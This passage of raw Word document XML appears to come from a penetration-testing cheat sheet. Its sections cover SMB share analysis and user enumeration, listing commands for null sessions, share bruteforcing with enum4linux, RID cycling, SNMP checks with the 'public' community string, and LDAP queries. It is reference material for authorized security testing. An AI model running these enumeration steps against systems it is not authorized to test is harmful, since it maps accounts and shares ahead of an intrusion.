          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">[33] </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Lotus Notes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Forte_$ND800ZA </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">[20] </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1539">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>DCA IrmaLan Gateway Server Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E1d - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Identifying and analysing accessible SMB shares</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B4D72" w:rsidRPr="00773CA4" w:rsidRDefault="009B4D72" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00840548" w:rsidRPr="00B017F5" w:rsidRDefault="00840548" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessions</w:t>
      </w:r>
      <w:r w:rsidR="00B017F5" w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850899" w:rsidRPr="00773CA4" w:rsidRDefault="00850899" w:rsidP="0085089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73CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> use \\&lt;ip_address&gt;\IPC "" /u:""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00773CA4" w:rsidRDefault="00FA3D71" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850899" w:rsidRPr="00B017F5" w:rsidRDefault="00A76B22" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> share enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76B22" w:rsidRPr="00773CA4" w:rsidRDefault="00A76B22"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 xml:space="preserve">enum.exe </w:t>
      </w:r>
      <w:r w:rsidR="00773CA4" w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–S &lt;ip address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850899" w:rsidRPr="00773CA4" w:rsidRDefault="00773CA4"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enum4linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.pl</w:t>
      </w:r>
      <w:r w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –S &lt;IP address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00773CA4" w:rsidRPr="00773CA4" w:rsidRDefault="00773CA4"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enum4linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.pl</w:t>
      </w:r>
      <w:r w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –s share-list.txt &lt;ip address&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00324A80">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bruteforce shares</w:t>
      </w:r>
      <w:r w:rsidR="00324A80">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00773CA4" w:rsidRPr="00773CA4" w:rsidRDefault="00773CA4" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BFC" w:rsidRPr="00B017F5" w:rsidRDefault="00EB1BFC" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>shares</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BFC" w:rsidRPr="00773CA4" w:rsidRDefault="00EB1BFC"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shareenum.exe</w:t>
      </w:r>
      <w:r w:rsidR="008C10E3" w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008C10E3" w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00773CA4" w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008C10E3" w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sysinternals GUI</w:t>
      </w:r>
      <w:r w:rsidR="00773CA4" w:rsidRPr="00773CA4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> – all shared in domain)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C10E3" w:rsidRDefault="008C10E3" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="00FA3D71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E2 - User Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="0071149B" w:rsidRDefault="00FA3D71" w:rsidP="0071149B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E2a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Identifying user accounts on target systems and domai</w:t>
      </w:r>
      <w:r>
        <w:t>ns using NetBIOS, SNMP and LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324A80" w:rsidRPr="00B017F5" w:rsidRDefault="00324A80" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Netbios</w:t>
      </w:r>
      <w:r w:rsidR="00B017F5" w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (restrict anonymous = 0)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324A80" w:rsidRPr="00B017F5" w:rsidRDefault="00324A80" w:rsidP="00B017F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017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –U &lt;ip address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00324A80" w:rsidRPr="00B017F5" w:rsidRDefault="00324A80" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00773CA4" w:rsidRPr="00B017F5" w:rsidRDefault="00B017F5" w:rsidP="00773CA4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Netbios (restrict anonymous = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00773CA4" w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rid cycling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>])</w:t>
      </w:r>
      <w:r w:rsidR="00773CA4" w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00773CA4" w:rsidRPr="00E47CD4" w:rsidRDefault="00773CA4" w:rsidP="00E47CD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E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>getacct.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00123C59" w:rsidRPr="00E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00123C59" w:rsidRPr="00E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008557B5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows GUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00773CA4" w:rsidRDefault="00773CA4" w:rsidP="00E47CD4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enum4linux</w:t>
      </w:r>
      <w:r w:rsidR="00B017F5" w:rsidRPr="00E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E47CD4" w:rsidRPr="00E47CD4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–r &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B017F5" w:rsidRDefault="00B017F5" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00B017F5" w:rsidRDefault="00B017F5" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SNMP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B017F5" w:rsidRDefault="00B017F5" w:rsidP="00B017F5">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snmpcheck.pl –t &lt;target&gt; -w –c public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">nice output + checks write </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BFC" w:rsidRPr="00B017F5" w:rsidRDefault="00EB1BFC" w:rsidP="00B017F5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getif</w:t>
      </w:r>
      <w:r w:rsidR="00B017F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1BFC" w:rsidRPr="00B017F5" w:rsidRDefault="00EB1BFC" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB1BFC" w:rsidRPr="005B2E2D" w:rsidRDefault="00B017F5" w:rsidP="005F25BF">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2E2D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LDAP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47CD4" w:rsidRDefault="005B2E2D" w:rsidP="003E42C7">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E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldp.</w:t>
      </w:r>
      <w:r w:rsidR="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windows support tool</w:t>
      </w:r>
      <w:r w:rsidR="00FB1E7E" w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (need creds for tcp/389 or GC tcp/3268)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E42C7" w:rsidRPr="003E42C7" w:rsidRDefault="003E42C7" w:rsidP="003E42C7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B017F5" w:rsidRDefault="005B2E2D" w:rsidP="003E42C7">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E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldapsearch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="003E42C7" w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="003E42C7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
